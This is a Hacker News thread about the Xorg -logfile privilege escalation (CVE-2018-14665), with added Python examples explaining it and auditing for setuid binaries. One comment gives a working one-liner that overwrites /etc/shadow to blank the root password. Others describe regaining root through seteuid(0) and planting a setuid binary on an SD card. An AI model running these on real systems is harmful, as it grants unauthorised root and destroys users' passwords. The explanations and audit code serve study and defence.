
EXploit X: “Give Me Root” [video] - octosphere
https://www.youtube.com/watch?v=3vCpYgaZpiw
======
megous
One way I got root recently, aside from pivoting on a setuid 0 binary, was
calling seteuid(0). The vendor's program manager on the device forgot to
call setuid(user_id); it only called seteuid(user_id). So going back to root was as easy
as seteuid(0). The joy of real and effective process user. :)

Another easy way, if you have a way to provide your own filesystem to the device
(via SD card for example), is to just put an Ext filesystem on it, and add
your own setuid 0 binary there. Device makers sometimes don't know what
they're doing, so they don't mount untrusted removable devices with -o
nosuid,noexec,nodev ...

That works even if there's no usable setuid 0 binary on the rootfs.

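The seteuid()/setuid() difference described above, as an added example that is not from the comment or from the vendor's code: a Python script that forks, drops privileges in the child one of the two ways, and then reports whether seteuid(0) got root back. It assumes Linux, a root shell to run it from (unprivileged callers get None), and 65534 as the uid to drop to.

```python
from __future__ import annotations

import os
from typing import Optional

# uid to drop to. 65534 is the conventional "nobody" uid (an assumption about
# the host); setuid(2) does not require it to exist in /etc/passwd.
DROP_UID = 65534

# Exit codes the forked child uses to report its result to the parent.
_REGAINED, _BLOCKED, _UNAVAILABLE = 0, 1, 2


def running_as_root() -> bool:
    return os.geteuid() == 0


def current_uids() -> tuple[int, int, int]:
    """(real, effective, saved) uid of the caller, e.g. (0, 65534, 0) after seteuid."""
    return os.getresuid()


def _drop_and_try_regain(method: str) -> int:
    """Runs inside the child: drop to DROP_UID with `method`, then try seteuid(0)."""
    try:
        if method == "seteuid":
            # Only the effective uid moves; real and saved uid remain 0.
            os.seteuid(DROP_UID)
        elif method == "setuid":
            # Called with euid 0, setuid(2) sets real, effective and saved uid.
            os.setuid(DROP_UID)
        else:
            raise ValueError(f"unknown method {method!r}")
    except OSError:
        return _UNAVAILABLE  # euid 0 without CAP_SETUID, or DROP_UID not mapped
    try:
        # Permitted only if 0 is still the real or the saved uid of the process.
        os.seteuid(0)
    except PermissionError:
        return _BLOCKED
    return _REGAINED


def regain_root_after(method: str) -> Optional[bool]:
    """Fork, drop privileges in the child with `method`, and report whether the
    child got euid 0 back.  None when the check cannot run (not root, or the
    drop itself failed)."""
    if not running_as_root():
        return None
    pid = os.fork()
    if pid == 0:
        code = _UNAVAILABLE
        try:
            code = _drop_and_try_regain(method)
        finally:
            os._exit(code)  # never fall through into the parent's code path
    _, status = os.waitpid(pid, 0)
    if not os.WIFEXITED(status):
        return None
    code = os.WEXITSTATUS(status)
    if code == _UNAVAILABLE:
        return None
    return code == _REGAINED


if __name__ == "__main__":
    for m in ("seteuid", "setuid"):
        print(f"drop via {m}: root regained with seteuid(0)? {regain_root_after(m)}")
```

Run it with sudo: the seteuid() variant reports True because the real and saved uid are still 0, the setuid() variant reports False because all three uids were changed. Each check runs in a forked child, so the parent keeps its own uids for the next check.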
~~~
megous
It doesn't help my confidence in the world that this was a PoS terminal
device from a self described "Leader in Payment Terminals". But hey, they even
read random files on the filesystem from a kernel USB device driver, and they
probably got to the market first, so that's what matters.

Thankfully, AFAIK, this particular device is not sold anymore.

~~~
microcolonel
> _a self described "Leader in Payment Terminals"_

In a marathon, the leader is not so much the _healthiest_ of the bunch.

Also, this is a PoS terminal; if there's any wonder left in you for how they
could mess this up so bad, I'm guessing this is the first one you've seen. ;-)

~~~
megous
Yes, the first one. One thing I liked about it though is that the vendor uses
a uniform ioctl calling convention for pretty much everything they implement in
the kernel, so I have modified strace to decode their ioctl payload, and I was
able to rewrite most of their library code with my implementation, with the
help of traces of their demo app. Now I can drop their complicated and buggy
userspace code completely and use my own rootfs.

The kernel is harder, since they also violate GPL and don't provide kernel
source code along with their terminal, and neither does their SoC vendor.

------
_nalply
The exploit is overwriting /etc/shadow with the log of Xorg. If you pass the
right string somehow you overwrite the root password. The trick is setting the
font path and the font path appears in the log. Of course this fills
/etc/shadow with a lot of bogus data, but one line in the log which describes
the root password is enough. Xorg can overwrite /etc/shadow when it is setuid
root.

Attention: don't attempt it on a system you need. The exploit destroys all
users' passwords. Or at least make a copy of /etc/shadow before trying.

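Why one usable line in a file full of log noise is enough, shown as an added example that is not from the comment or from Xorg: a simplified Python model of how glibc's files backend reads /etc/shadow. Leading whitespace on a line is skipped and lines that lack the shadow(5) field layout are ignored, so the font path Xorg echoes into its log is found as root's record, and an empty password field means no password is asked for. The log excerpt is constructed to resemble an Xorg log; its exact format is an assumption.

```python
from dataclasses import dataclass
from typing import List, Optional

# Constructed text standing in for /etc/shadow after Xorg has logged into it.
# The exact Xorg log format is an assumption; what matters is that the
# attacker-supplied font path lands on its own line, indented with a tab.
SAMPLE_OVERWRITTEN_SHADOW = (
    "[    12.345] (**) Option \"-logfile\" \"shadow\"\n"
    "[    12.346] (==) Log file: \"/etc/shadow\", Time: Sun Oct 28 12:00:00 2018\n"
    "[    12.350] (**) FontPath set to:\n"
    "\troot::17833:0:99999:7:::\n"
)


@dataclass
class ShadowEntry:
    name: str
    pw_hash: str            # "" = no password needed; "!" or "*" = locked
    lastchg: Optional[int]  # days since the epoch of the last change
    rest: List[str]         # min, max, warn, inactive, expire, flag


def parse_shadow_line(line: str) -> Optional[ShadowEntry]:
    """Simplified model of the nss_files shadow parser: leading whitespace is
    skipped, and a line without the shadow(5) shape is ignored."""
    line = line.lstrip(" \t").rstrip("\r\n")
    if not line or line.startswith("#"):
        return None
    fields = line.split(":")
    if len(fields) < 9 or not fields[0]:
        return None
    # The six date/age fields must be empty or numeric.
    if any(f and not f.isdigit() for f in fields[2:8]):
        return None
    lastchg = int(fields[2]) if fields[2] else None
    return ShadowEntry(fields[0], fields[1], lastchg, fields[3:9])


def lookup(name: str, shadow_text: str) -> Optional[ShadowEntry]:
    """First record for `name`; unparsable lines before it are skipped."""
    for line in shadow_text.splitlines():
        entry = parse_shadow_line(line)
        if entry is not None and entry.name == name:
            return entry
    return None


def password_state(entry: ShadowEntry) -> str:
    """'none' (login without a password), 'locked', or 'set'."""
    if entry.pw_hash == "":
        return "none"
    if entry.pw_hash.startswith(("!", "*")):
        return "locked"
    return "set"


if __name__ == "__main__":
    root = lookup("root", SAMPLE_OVERWRITTEN_SHADOW)
    print(root, password_state(root) if root else "no root record")
```

The font path passed to Xorg must not contain commas, since the log writer breaks the path at each comma onto a new line, and the line that is wanted is the one carrying the tab-indented path, not the "FontPath set to:" header, which has too few fields to parse.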
~~~
smsm42
> The exploit is overwriting /etc/shadow with the log of Xorg.

That took me a couple of seconds to read and I got virtually the same
information as the 11 minute video. I think there's no question about which
way of doing things is more efficient.

------
DyslexicAtheist
# get root:

    cd /etc; Xorg -fp "root::<passwd>::" -logfile shadow :1;su

~~~
dan1234
How many linux servers have Xorg installed? Certainly none of mine, though I
mainly work with web & db servers.

~~~
pastage
Lots of RHEL servers do, but I would guess that selinux stops this exploit; I
see no reason for X to have write permission in /etc.

~~~
gizmo686
Redhat ships with a targeted policy. Most of the non-network programs are put
in a very permissive domain to avoid breakage.

I just checked the CentOS policy[0] (not at work and don't have easy access to
the Redhat repos).

It appears that xserver_t does have write access to both etc_t and shadow_t
[1].

More specifically, xserver_t is part of the selinux_unconfined_type attribute,
which means that it can do pretty much anything. (Even more specifically, it
is part of the files_unconfined_type attribute, which gives it write
permissions to everything in file_type):

      > sesearch --allow -s xserver_t -t shadow_t -c file policy.31
      allow files_unconfined_type file_type:file execmod; [ selinuxuser_execmod ]:True
      allow files_unconfined_type file_type:file { append audit_access create execute execute_no_trans getattr ioctl link lock mounton open quotaon read relabelfrom relabelto rename setattr swapon unlink write };


[0] https://centos.pkgs.org/7/centos-updates-x86_64/selinux-policy-targeted-3.13.1-192.el7_5.6.noarch.rpm.html

[1] Because of its sensitive nature, /etc/shadow has its own SELinux label

------
EugeneOZ
Why video? It's not about fashion or architecture; please, people, use text.

~~~
octosphere
Some people (like me) are visual learners / auditory learners and
Computerphile caters to that niche of learners. This is why I prefer
videos/audio over tangible books that you can hold. It is also common to see
me putting blogposts into text-to-speech programs and then I listen to them at
night or on the train.

~~~
EugeneOZ
Well... I knew about visual learners, I didn't know how strong this effect is.
At least I learned something today :) Sorry.

~~~
a_bonobo
Both of you may be interested in this research from last year:

No evidence to back idea of learning styles

https://www.theguardian.com/education/2017/mar/12/no-evidence-to-back-idea-of-learning-styles

~~~
EugeneOZ
It's not research, it's just a manifest.

~~~
octosphere
We are naturally inclined to have certain biases towards different learning
styles. It's really a psychology issue. What bothers me about these studies
that claim we should 'work harder' on our weaknesses (i.e. visual learners
should read more books/text) - is that we should also build on strength.

When you bolster one learning style and neglect the other, but learn more in
the process of the preferred learning style, then why not see it to the end,
and understand / digest the knowledge gained?

I guess it is about balance. If I am a pure visual (or auditory) learner, then
surely I would have learned that books/text have their place. I imagine that
the greatest learners out there use _all_ the learning styles but still have a
bias towards their learning style. How pronounced that bias is, is still
unknown.

------
molsson
Looks like it was patched in Ubuntu 18.04 just two weeks ago, see "apt
changelog xserver-xorg-core":

    xorg-server (2:1.19.6-1ubuntu4.2) bionic-security; urgency=medium

      * SECURITY UPDATE: Privilege escalation and file overwrite
        - debian/patches/CVE-2018-14665.patch: disable -logfile and -modulepath
          when running with elevated privileges in
          hw/xfree86/common/xf86Init.c.
        - CVE-2018-14665

     -- Marc Deslauriers <marc.deslauriers@ubuntu.com>  Thu, 25 Oct 2018 11:18:32 -0400

------
_nalply
Xorg might not be the only exploitable software. Here is the approach to search
for other exploits:

1. Is the software setuid-root?

2. Does the software stay as root?

3. Can you make it write a user description line like the one in /etc/shadow?

4. Can you direct it to write to /etc/shadow?

An example: Xorg is setuid-root and stays as root. Pass it root's
description line as a (bogus) font path and it will write an error message.
Redirect the error message to /etc/shadow and your exploit is finished.

I am afraid that other setuid-root programs could be exploitable.

setuid-root is extremely dangerous.

~~~
molsson
Find other setuid binaries on your system using:

    find / -user root -perm -4000 -print 2>&1 | grep -v "Permission denied"

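The same audit in Python, as an added example that is not part of either comment: find_setuid_files() answers step 1 above the way molsson's find command does (setuid files owned by root, unreadable directories skipped), and removable_mounts_without_hardening() checks the gap megous describes at the top of the thread, removable media mounted without nosuid,nodev,noexec. The mount table and the temporary directory are constructed for illustration; the media-directory prefixes and the device-name heuristic are assumptions about the host.

```python
import os
import stat
import tempfile
from typing import Dict, List, Set

# Mount options that stop a removable filesystem from being a root vector.
HARDENING: Set[str] = {"nosuid", "nodev", "noexec"}

# Where removable media usually appear (an assumption about the host; extend
# it for the device being audited).
REMOVABLE_MOUNT_PREFIXES = ("/media", "/mnt", "/run/media")


def find_setuid_files(root: str = "/", owner_uid: int = 0) -> List[str]:
    """Regular files under `root` owned by `owner_uid` with the setuid bit set.
    Directories that cannot be read are skipped, like find's "Permission denied"."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        # Stay out of pseudo-filesystems: nothing useful there, and /proc is huge.
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in ("/proc", "/sys", "/dev")]
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if (stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID
                    and st.st_uid == owner_uid):
                hits.append(path)
    return sorted(hits)


def parse_mounts(text: str) -> List[dict]:
    """Rows of a /proc/mounts-style table: device, mountpoint, fstype, options."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        rows.append({"device": parts[0], "mountpoint": parts[1],
                     "fstype": parts[2], "options": set(parts[3].split(","))})
    return rows


def is_removable(row: dict) -> bool:
    """Heuristic: SD cards (mmcblk*) or USB disks (sd*) under a media directory."""
    dev = os.path.basename(row["device"])
    return (dev.startswith(("mmcblk", "sd"))
            and row["mountpoint"].startswith(REMOVABLE_MOUNT_PREFIXES))


def removable_mounts_without_hardening(mounts_text: str) -> Dict[str, Set[str]]:
    """mountpoint -> hardening options it lacks, for every removable mount."""
    findings = {}
    for row in parse_mounts(mounts_text):
        if is_removable(row):
            missing = HARDENING - row["options"]
            if missing:
                findings[row["mountpoint"]] = missing
    return findings


# Constructed /proc/mounts excerpt: an SD card with no hardening, a USB stick
# mounted correctly, and one mounted only partially.  The remedy for the first:
#   mount -o remount,nosuid,nodev,noexec /mnt/sdcard
SAMPLE_MOUNTS = """\
/dev/sda2 / ext4 rw,relatime,errors=remount-ro 0 0
proc /proc proc rw,nosuid,nodev,noexec,relatime 0 0
/dev/mmcblk0p1 /mnt/sdcard ext4 rw,relatime 0 0
/dev/sdb1 /media/usb0 vfat rw,nosuid,nodev,noexec,relatime,uid=1000 0 0
/dev/sdc1 /media/usb1 ext4 rw,nosuid,relatime 0 0
"""


def make_demo_tree() -> str:
    """Throwaway directory with one setuid file and one plain file, both owned
    by the caller, so find_setuid_files() can be tried without root."""
    base = tempfile.mkdtemp(prefix="suid-audit-")
    suid = os.path.join(base, "suid-tool")
    plain = os.path.join(base, "plain-tool")
    for p in (suid, plain):
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\n")
    os.chmod(suid, 0o4755)
    os.chmod(plain, 0o755)
    return base


def current_uid() -> int:
    return os.getuid()


if __name__ == "__main__":
    print(removable_mounts_without_hardening(SAMPLE_MOUNTS))
    print(find_setuid_files(make_demo_tree(), owner_uid=current_uid()))
```

To audit a live box, feed the real table with open("/proc/mounts").read() and call find_setuid_files() with its defaults; the walk skips /proc, /sys and /dev, and a directory the caller cannot read is simply not descended into, which is what the find command's grep was hiding.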
------
netsec_burn
Wouldn't it be far safer to use cron? Or authorized_keys? Why passwd?

~~~
MayeulC
I am not sure I quite got your question, and had a very succinct look at the
video, but passwd is being used here as a way to check whether the user has
root access.

It is important to note that this exploit is an old one, has been known for a
while, and is one of the things being addressed by switching to Wayland.

That said, a lot of work has been done towards running X11 rootless (Arch for
instance [1]). That should be possible as long as you use DRI, as far as I
know (which is the case if you use a graphics card less than about ~10-20
years old, depending on the brand).

[1]
[https://wiki.archlinux.org/index.php/Xorg#General](https://wiki.archlinux.org/index.php/Xorg#General)

